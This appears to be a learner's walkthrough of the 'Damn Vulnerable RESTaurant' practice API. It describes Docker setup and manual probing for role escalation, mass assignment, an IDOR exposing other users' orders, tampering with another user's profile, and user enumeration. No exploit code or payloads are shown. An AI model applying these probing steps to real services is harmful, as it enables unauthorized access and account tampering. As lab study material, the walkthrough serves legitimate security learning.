Damn Vulnerable RESTaurant
Last updated
Last updated
You need to install docker first, here is the process for ubuntu:
Get docker desktop deb package from (here)[https://desktop.docker.com/linux/main/amd64/docker-desktop-amd64.deb?utm_source=docker&utm_medium=webreferral&utm_campaign=docs-driven-download-linux-amd64]
The API service will be exposed at http://localhost:8080 by default. API documentation can be found at the following endpoints:
Swagger - http://localhost:8080/docs
Redoc - http://localhost:8080/redoc
To close the restaurant at the end of the hacking day, just run:
./stop_app.sh
Data will persist between stops and starts.
Here is our token:
We can now add our token in a request. Let's try this in the /profile endpoint
Then we get a response with infos about our user, so we can authenticate properly
We get a 500 with our token and a non authenticated without token if we try with the role "admin".
We could try to find a way to get a list of the roles or at least what other roles with have besides customer. Let's try out other requests from the swagger to check out what it does and enumerate further.
works with and without authentication
works with and without authentication
does not works without authentication
We get a forbidden with a customer token
Same with PUT /menu/id
Does not seem to work with my token or without a token, the request seems to time out
Does not work without token but works with a customer token
Works only with token
Works only with token
Note: it would be worth checking if I can get another user's order here.
For the auth categorie of requests we should be good to go for now. I will at some point to check what happens with the password reset.
This one seems interesting. Let's check it out. Without a token it returns a response that said we are unauthenticated and with a token we get this:
So here we get another role "chef".
Let's try to use again the update role endpoint with chef as role and see what we get. We still get a 500, and if we try with "Chef" we get this response:
I also wanted to try mass assignment by adding a role in the PUT /profile but did not get me anywhere either. So let's explore other things.
First let's create another user to see if we can access other users' orders.
So now let's check to see if we can see order 1 (the order with our former user) with our new user. And it works! So here we have a bola also known as idor:
With burp community the intruder is too slow. Let's try another fuzzer.
If we go to the docs, we can find an endpoint to register a new user. Let's do this first. We can intercept the request via burp to modify the infos (we can also use swaggerui).
So now we can try to login with the post request get token, this way we get a jwt token
So there's an enpoint that can update a user, let's try to see if we can update our user with it
Let's place an order as this user. To do this we first need a token, and then we can put our token in the POST /orders request. Our order is created with id 2:
So now I want to have a look at the /profile endpoint. I can modify my own information. How about the other users info. Let's see if the user csbygb has beed modified with the "pwned" strings in the fields. It did work. Before I had tried to add a Chef role on my own user but not on another, but this did not work either. What's interesting here is that if we have a valide user our user info get sent back to us but if not, we get a 500. So we could try to enumerate users
